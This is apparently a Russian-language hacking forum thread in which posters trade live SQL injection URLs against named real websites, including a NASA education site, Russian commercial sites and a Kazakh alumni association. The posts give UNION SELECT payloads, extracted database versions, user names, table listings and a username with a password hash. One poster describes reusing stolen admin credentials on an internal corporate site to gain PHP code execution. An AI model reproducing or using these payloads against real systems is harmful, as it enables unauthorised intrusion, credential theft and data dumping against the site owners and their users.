http://www.cotraj.ru Скуль http://www.cotraj.ru/catalog.php?cat=1{SQLINJ} Database Version: 4.0.26 Database name: wwwcotrajru User name: [email protected] information_schema не пустили, имя таблиц узнать не удалось,хостер рбк
Очень содержательная скуль...кол-ва столбцов нет , с каких пор в 4.0.26 существует таблица information_schema ? =\ Она есть в версиях >5
Code: http://www.terrorism.com/index.php?catid=-1+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20--
Это к посту выше через пост http://www.cotraj.ru/catalog.php?cat=1/**/union/**/select/**/version()/**/limit/**/1,1/* user - [email protected] database - wwwcotrajru
http://vnorilske.ru/index.php?page_id=40&fi_sex=1%20union%20select%20version(),user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,database(),20,21,22,23/*&f_online=1 Версия 5.0.45-community-nt-log Пользователь eleonora65465RT@localhost База knopotuska
nasa.gov HTML: http://nasaexplores.nasa.gov/show_912_teacher_st.php?id=null%27%20Union%20Select%20%201%20,2,3,concat_ws(char(58),user,password),5,6,7,8,9,10,11,12,13%20,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%20,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201+from+mysql.user/*
Очередная контора делающая сайты "лучше" других... Была найдена бага в http://www.tta.su Функци класса concat, hex etc.. не работают, поэтому: http://www.tta.su/infusions/my_frends_panel/messages.php?msg_send=-1+union+select+1,user_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+tennis_users+limit+0,10-- http://www.tta.su/infusions/my_frends_panel/messages.php?msg_send=-1+union+select+1,user_password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+tennis_users+limit+0,10-- login:Sam_Fox pass:42e404a41193717e192856392b2b21b6 В данном случае, имеется доступ к нескольким базам, от разных сайтов. Поковырявшись и пораскинув мозгом, было выявлено, что среди прочих там присутствуют: bizedu.ru tta.su proftests.ru ... proftests.ru <- внутренний корпоративный сайт всей этой гоп-компании(только длясотрудников сайт). логин и пасс, которые мы поимели с tta.su(Sam_Fox) -> подходят(админовский акк, по крайней мере этот). Есть возможность выполнения произвольного php кода, через "администрирование контента".
Довольно крупный игровой портал. http://www.rolemancer.ru/article.php?sid=-1{SQLINJ} Database Version: 4.1.7 Database name: rolemancer User name: rolemancer@localhost Table : users name pass uname email uid user_icq user_viewemail Table : authors aid email name pwd
http://www.offsidetalk.com Code: http://www.offsidetalk.com/thread.php?id=22&postNum=21=null%20union%20all%20select%200,concat(version(),0x3c62723e,database(),0x3c62723e,user()),2,3,4,5+from+users-- version() => 5.0.67-log database() => cosa user() => [email protected] БД: Code: cosa Таблицы cosa: Code: Posts_1 Posts_10 Posts_11 Posts_12 Posts_13 Posts_14 Posts_15 Posts_16 Posts_17 Posts_18 Posts_19 Posts_2 Posts_20 Posts_21 Posts_22 Posts_23 Posts_24 Posts_25 Posts_26 Posts_27 Posts_28 Posts_29 Posts_3 Posts_30 Posts_31 Posts_32 Posts_33 Posts_34 Posts_35 Posts_36 Posts_37 Posts_38 Posts_39 Posts_4 Posts_40 Posts_41 Posts_42 Posts_43 Posts_44 Posts_45 Posts_46 Posts_47 Posts_48 Posts_49 Posts_5 Posts_50 Posts_51 Posts_52 Posts_53 Posts_54 Posts_55 Posts_56 Posts_57 Posts_58 Posts_59 Posts_6 Posts_60 Posts_61 Posts_62 Posts_63 Posts_64 Posts_65 Posts_66 Posts_67 Posts_68 Posts_7 Posts_8 Posts_9 admin affil_lookup amazonLinks authorInfo blogComments blogComments_1 blogs bookmarks bugComments bugs colors dailyStats dailyThreadInfo dailyUserStats deadToMe dirAffiliates errorLog exports_highlights exports_subs exports_threads exports_users extras folderOrder folders forumPrefs highlights highlights_old hits hostedThread imported_subs imported_threads ints limeusers_config limeusers_info limeusers_sessions limeusers_users limewiki_nodehistory limewiki_nodes nameChange poll_ poll__responses poll_answers poll_questions pollresults_1 polls portal_fields portals prefs recent search sessions subscriptions sugComments suggestions taggedThreads tags test testing threadRules threadTags threads time tmp userAccess userStatus user_abdabs user_acourfoutfify user_admin user_affonvinevy user_agorenbo user_ahmadenajadsukka user_alexisamore user_alfpidasant user_alladobeoemsoftdownload user_amelyfo user_ameshymoomy user_andrew user_appeaktrato user_appefsnab user_aromatizatorzzzy user_ashtonmoore user_asistond user_avavincent user_bakalinvadbad user_beencydoolo user_beishticrit user_benderkoz user_bestsfarmasshops user_biidbkonudyinffh user_billybossman user_billyboyka user_bionnesyslele user_blackdog user_blackrose user_bligetabaiste user_bob user_boicioulk user_boxvista user_boydaytub user_bozybouslysop user_breelszet user_brett user_brianabanks user_britneyloverii user_brorwaypago user_buycheapsoftwareyy user_buycheapviagracialisss user_buycheapviagracialiszz user_buyviagraonlineusatoday user_bypehyday user_centerprestigsss user_cesycausync user_chaseshdstforum user_cheapviagracialissr user_chelle user_chezza00 user_chezza38 user_chimchans user_cialisbestprice user_comprarviagraonlinejo user_coodynexme user_cooperbryantalwilda user_creativeacrobate user_designerinfo user_dhbhsmdviu user_diewololorled user_djaambi11 user_donmandronas user_donttouchmethere user_dooguelog user_downloadadobephotoshopfree user_downloadcheapoemfree user_downloadcheapoemstore user_drakssick user_drwebbn user_dugmentorweb user_dvdcattrisept user_effikeingem user_emonetoff user_encotoaddet user_entenueaccobe user_enzytforum user_epherfede user_essencerec user_esservehigo user_eucmwtjasygck user_eustoss user_evellineiris user_faidebisa user_fartsnidatt user_fiexindip user_fildermac user_flumemalp user_foggy user_franchesco user_francis user_frankexr user_frieseejege user_fuckahmadenagad user_gaildclemmer user_gapydyewere user_genyakka user_geoff user_georgieworst user_glopsipsels user_gnomikl user_godcousins user_gogejeawbange user_gokecrove user_goldencarnns user_gradsmrad user_granciatskica user_greessinise user_gremlin user_gremlinbug user_handbagsro user_hedoerromandy user_hieplethy user_hilmretle user_hirefinfiploff user_homedoctor user_hughe user_iambert user_iloveme user_inhineeideobe user_interneprestyw user_inzzforever user_ireneaveline user_jesikafclq user_jo user_johnnyxq user_jono user_kamikaze user_kamikazekeeper user_kamikazenutter user_kenzy user_kenzy10 user_kikemran user_kildfuddy user_krazykeeper user_kristinavoicc user_labudash user_lalpdyday user_lawotep user_leakinmycrownjewels user_leccepenincah user_lelisilltoura user_lime user_lindmannnn user_lingmesse user_litantene user_llblackslutsll user_looreed user_maisonvq user_mancitymad user_manufactureoemsoftware user_marlborocig user_medeqaz user_meespalhekper user_mefeoppongoni user_metrocarryzjj user_metrocashcarryry user_metrosarrysfgt user_mikeusay user_milenajaf user_mofflugsnom user_moxeyel user_mr user_nat user_niaikep user_notasobr user_nunziatoelizabeth user_offleaseru user_onepubrerib user_onlinecialisviagrabuy user_onpakkpwmwmvfr user_ordervini user_oscarjackson user_oschepkovz user_photoshopadob user_phydaysteesty user_pikolezaks user_pluslondoms user_polmangirl user_portjassica user_prestigesmwm user_privettutja user_promskladstanki user_puzobok user_rabbit70 user_randyspears user_reibrawhite user_rensiobbips user_samantharo user_sateliterus user_satuedeclelve user_scarletmillie user_selpkeemi user_serga user_sexmastergb user_sextube user_shancyvagnene user_sheridansup user_shurfastifift user_sizeaspem user_skvbirzharu user_sonserryvierohome user_srmt user_sselldumps user_stafkolter user_stankotorgforum user_strongjannabiz user_suiquehig user_supunmano user_tanyalarina user_tarfbrefemebyv user_taupdaptoks user_tedvatcatitest user_testyjo user_thegoalie user_thegoalie2 user_thomas1 user_tipokotpu user_tosifers user_towtucttons user_trastuso user_tritinvallemn user_twntysevnbase user_viagrabuycheapestvigras user_viagracheaprice user_viagracialislischeapest user_vistaultimatedownloadapro user_voliidiowly user_wepallomo user_westomkew user_wyrddave user_xolonho user_yongbers user_youngic user_yrealmale user_zalivaika users[password, email] violations Закалибался выковыривать )) 371 таблица.. Можно сделать отличный дамп. + мну... http://csteachers.org Code: http://csteachers.org/thread.php?id=4&postNum=3=null%20union%20all%20select%200,concat(version(),0x3c62723e,database(),0x3c62723e,user()),2,3,4,5-- version() => 4.1.16-standard-log database() => csteachers user() => [email protected]
MySQL: 5.0.51a-log DBASE: host1843 USER: [email protected] _http://www.nord-east.ru/index.php?id=-1%20union%20select%201,concat_ws(char(58),login,pass),3,4%20from%20auth%20-- Админку не нашел (
Ассоциация выпускников Международной стипендии Президента Республики Казахстан «Болашак» p.s : таблы заебся подбирать, там есть форум phpbb но что то мне подсказывает что всё зранится в разных базах...
www.novirealty.ca Code: http://www.novirealty.ca/waterfront.php?fid=510/**/union/**/select/**/1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169/*&page=2 Version: 4.1.20 User: f1shst1cks@localhost =/
может все-таки так? http://www.bolashak.kz/?lang=ru&type=news&id=-46+union+select+1,2,version(),4,5,6,7,8/*
safe-shop.ru Code: http://www.safe-shop.ru/indx.php?c=articles&id=2+and+1=0+union+select+1,2,concat(user(),0x20,version(),0x20,database()),4+-- [email protected] 5.0.67-log u8606_2 1.from_kp 1.1 id 1.2 ip 1.3 dates 1.4 http_from 2.kv 2.1 id 2.2 pole 2.3 pole2 3.kv_gr 4.kv_instr 5.kv_maingr 6.kv_news 7.kv_ss 7.1 id 7.2 name 7.3 prior 7.4 time_id 8.kv_st
Если посмотреть вниз, то там написано: Parts powered by WordPress Нашлось - таблица: wp_users Поля: id,user_aim,user_email,user_icq,user_ip
4я версия мускула, так что выудить мало чего получается. Нашел таблицу users. Есть поля id, email. Другие подобрать не смог. Подозреваю, что из этой таблицы производится вход в http://sales.conkurent.com/affiliates/index.php Вот скуля: http://conkurent.com/news.php?id=4%20union%20select%201,2,3,concat_ws(char(58),id,email),5%20from%20users/*
http://www.casinoratgeber.com/index.php?bid=-3+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+
